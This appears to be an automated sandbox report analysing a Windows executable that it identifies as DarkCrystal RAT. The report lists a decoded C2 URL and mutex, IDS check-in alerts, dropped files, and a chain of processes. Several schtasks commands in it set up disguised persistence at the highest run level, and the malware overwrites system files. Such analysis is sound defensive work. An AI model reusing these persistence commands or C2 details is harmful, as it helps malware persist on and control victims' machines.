Source: 00000005.00000002.2319266485.00000000129EC000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-9i5llWSDsSpUTw8pYfrW","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
Source: 00000005.00000002.2319266485.00000000129EC000.00000004.00000800.00020000.00000000.sdmp	String decryptor: [["http://480344cm.renyash.ru/","lineSecureUpdateprocessdefaultTestPublicUploadsTemporary"]]

Source: DC86.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: DC86.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: DC86.exe
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\gvn4blmg\gvn4blmg.pdb source: hyperProviderbrokermonitorNet.exe, 00000005.00000002.2314945218.0000000003104000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: :C:\Users\user\AppData\Local\Temp\obippivd\obippivd.pdb source: hyperProviderbrokermonitorNet.exe, 00000005.00000002.2314945218.0000000003104000.00000004.00000800.00020000.00000000.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Windows\System32\SecurityHealthSystray.exe			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe			Jump to behavior

Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_009EA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_009EA69B
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_009FC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_009FC220
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_00A0B348 FindFirstFileExA,	0_2_00A0B348

Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49885 -> 172.67.220.198:80

Source: hyperProviderbrokermonitorNet.exe, 00000027.00000002.2429370078.0000000001015000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.mich
Source: hyperProviderbrokermonitorNet.exe, 00000005.00000002.2314945218.0000000002B69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\DC86.exe

Code function: 0_2_009E6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_009E6FAA

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\CSCBF0D9C89CA2D49349EF95B69138A8B32.TMP			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\SecurityHealthSystray.exe			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File deleted: C:\Windows\System32\CSCBF0D9C89CA2D49349EF95B69138A8B32.TMP

Jump to behavior

Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_009E848E	0_2_009E848E
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_009F4088	0_2_009F4088
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_009F00B7	0_2_009F00B7
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_009E40FE	0_2_009E40FE
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_00A051C9	0_2_00A051C9
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_009F7153	0_2_009F7153
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_009F62CA	0_2_009F62CA
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_009E32F7	0_2_009E32F7
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_009F43BF	0_2_009F43BF
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_009EC426	0_2_009EC426
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_00A0D440	0_2_00A0D440
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_009EF461	0_2_009EF461
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_009F77EF	0_2_009F77EF
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_00A0D8EE	0_2_00A0D8EE
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_009E286B	0_2_009E286B
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_009EE9B7	0_2_009EE9B7
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_00A119F4	0_2_00A119F4
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_009F6CDC	0_2_009F6CDC
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_009F3E0B	0_2_009F3E0B
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_00A04F9A	0_2_00A04F9A
Source: C:\Users\user\Desktop\DC86.exe	Code function: 0_2_009EEFE2	0_2_009EEFE2
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Code function: 5_2_00007FFD34660D47	5_2_00007FFD34660D47
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Code function: 5_2_00007FFD34660E43	5_2_00007FFD34660E43
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Code function: 5_2_00007FFD34A609F2	5_2_00007FFD34A609F2
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Code function: 5_2_00007FFD34A6098D	5_2_00007FFD34A6098D
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Code function: 5_2_00007FFD34A60C55	5_2_00007FFD34A60C55
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Code function: 38_2_00007FFD346696AC	38_2_00007FFD346696AC
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Code function: 38_2_00007FFD346688B7	38_2_00007FFD346688B7
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Code function: 38_2_00007FFD346910EA	38_2_00007FFD346910EA
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Code function: 38_2_00007FFD3469D312	38_2_00007FFD3469D312
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Code function: 38_2_00007FFD34660D47	38_2_00007FFD34660D47
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Code function: 38_2_00007FFD34660E43	38_2_00007FFD34660E43
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Code function: 39_2_00007FFD346910EA	39_2_00007FFD346910EA
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Code function: 39_2_00007FFD3469D312	39_2_00007FFD3469D312
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Code function: 39_2_00007FFD346696AC	39_2_00007FFD346696AC
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Code function: 39_2_00007FFD346688B7	39_2_00007FFD346688B7
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Code function: 39_2_00007FFD34660D47	39_2_00007FFD34660D47
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Code function: 39_2_00007FFD34660E43	39_2_00007FFD34660E43
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Code function: 40_2_00007FFD34679236	40_2_00007FFD34679236
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Code function: 40_2_00007FFD346788B7	40_2_00007FFD346788B7
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Code function: 40_2_00007FFD346A10EA	40_2_00007FFD346A10EA
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Code function: 40_2_00007FFD346AD312	40_2_00007FFD346AD312
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Code function: 40_2_00007FFD34670D47	40_2_00007FFD34670D47
Source: C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe	Code function: 40_2_00007FFD34670E43	40_2_00007FFD34670E43
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Code function: 46_2_00007FFD34650D47	46_2_00007FFD34650D47
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Code function: 46_2_00007FFD34650E43	46_2_00007FFD34650E43

Source: Joe Sandbox View

Dropped File: C:\Users\user\Desktop\BfvFrBjN.log 1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8

Source: C:\Users\user\Desktop\DC86.exe	Code function: String function: 009FEB78 appears 39 times
Source: C:\Users\user\Desktop\DC86.exe	Code function: String function: 009FEC50 appears 56 times
Source: C:\Users\user\Desktop\DC86.exe	Code function: String function: 009FF5F0 appears 31 times

Source: PuTbcYNO.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: GQKmsfxg.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: oncOKnjP.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: zSWmQQDs.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: iLGHwdYd.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: gBkGwLsc.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: XXbRMRdv.log.5.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: PdatkTco.log.18.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: oOURfLEr.log.18.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: LNOVbeou.log.18.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: BfvFrBjN.log.18.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: sBmPHITf.log.18.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ZkzjoDJQ.log.18.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: RGruEKtj.log.18.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: DC86.exe

Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs DC86.exe

Source: DC86.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: hyperProviderbrokermonitorNet.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PuhmblZdAcSNmlRDfzjrgW.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PuhmblZdAcSNmlRDfzjrgW.exe0.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PuhmblZdAcSNmlRDfzjrgW.exe1.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PuhmblZdAcSNmlRDfzjrgW.exe2.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: WmiPrvSE.exe.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winEXE@53/45@0/0

Source: C:\Users\user\Desktop\DC86.exe

Code function: 0_2_009E6C74 GetLastError,FormatMessageW,

0_2_009E6C74

Source: C:\Users\user\Desktop\DC86.exe

Code function: 0_2_009FA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_009FA6C2

Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe

File created: C:\Program Files (x86)\windows defender\en-GB\PuhmblZdAcSNmlRDfzjrgW.exe

Jump to behavior

Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe

File created: C:\Users\user\Desktop\oncOKnjP.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4052:120:WilError_03
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2724:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4800:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4924:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:800:120:WilError_03
Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-9i5llWSDsSpUTw8pYfrW

Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe

File created: C:\Users\user\AppData\Local\Temp\gvn4blmg

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\hyperIntoBroker\7ZVJJhRLWkC.bat" "

Source: C:\Users\user\Desktop\DC86.exe	Command line argument: sfxname	0_2_009FDF1E
Source: C:\Users\user\Desktop\DC86.exe	Command line argument: sfxstime	0_2_009FDF1E
Source: C:\Users\user\Desktop\DC86.exe	Command line argument: STARTDLG	0_2_009FDF1E

Source: DC86.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: DC86.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\DC86.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\DC86.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: DC86.exe	Virustotal: Detection: 55%
Source: DC86.exe	ReversingLabs: Detection: 63%

Source: C:\Users\user\Desktop\DC86.exe

File read: C:\Users\user\Desktop\DC86.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\DC86.exe "C:\Users\user\Desktop\DC86.exe"
Source: C:\Users\user\Desktop\DC86.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\hyperIntoBroker\vN1MMUTrCtC1FtSWQe4vLUvQugg9bTGuni3V.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\hyperIntoBroker\7ZVJJhRLWkC.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe "C:\hyperIntoBroker/hyperProviderbrokermonitorNet.exe"
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\WmiPrvSE.exe'" /rl HIGHEST /f
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\WmiPrvSE.exe'" /rl HIGHEST /f
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gvn4blmg\gvn4blmg.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3377.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC54DAB3F1F89841D48E3F80BA35A395CE.TMP"
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obippivd\obippivd.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES355B.tmp" "c:\Windows\System32\CSCBF0D9C89CA2D49349EF95B69138A8B32.TMP"
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgWP" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe'" /f
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgW" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe'" /rl HIGHEST /f
Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe "C:\Program Files (x86)\microsoft office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe"
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgWP" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\microsoft office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe'" /rl HIGHEST /f
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgWP" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows defender\en-GB\PuhmblZdAcSNmlRDfzjrgW.exe'" /f
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgW" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\en-GB\PuhmblZdAcSNmlRDfzjrgW.exe'" /rl HIGHEST /f
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgWP" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows defender\en-GB\PuhmblZdAcSNmlRDfzjrgW.exe'" /rl HIGHEST /f
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgWP" /sc MINUTE /mo 10 /tr "'C:\Recovery\PuhmblZdAcSNmlRDfzjrgW.exe'" /f
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgW" /sc ONLOGON /tr "'C:\Recovery\PuhmblZdAcSNmlRDfzjrgW.exe'" /rl HIGHEST /f
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgWP" /sc MINUTE /mo 14 /tr "'C:\Recovery\PuhmblZdAcSNmlRDfzjrgW.exe'" /rl HIGHEST /f
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgWP" /sc MINUTE /mo 7 /tr "'C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe'" /f
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgW" /sc ONLOGON /tr "'C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe'" /rl HIGHEST /f
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgWP" /sc MINUTE /mo 9 /tr "'C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe'" /rl HIGHEST /f
Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hyperProviderbrokermonitorNeth" /sc MINUTE /mo 5 /tr "'C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe'" /f
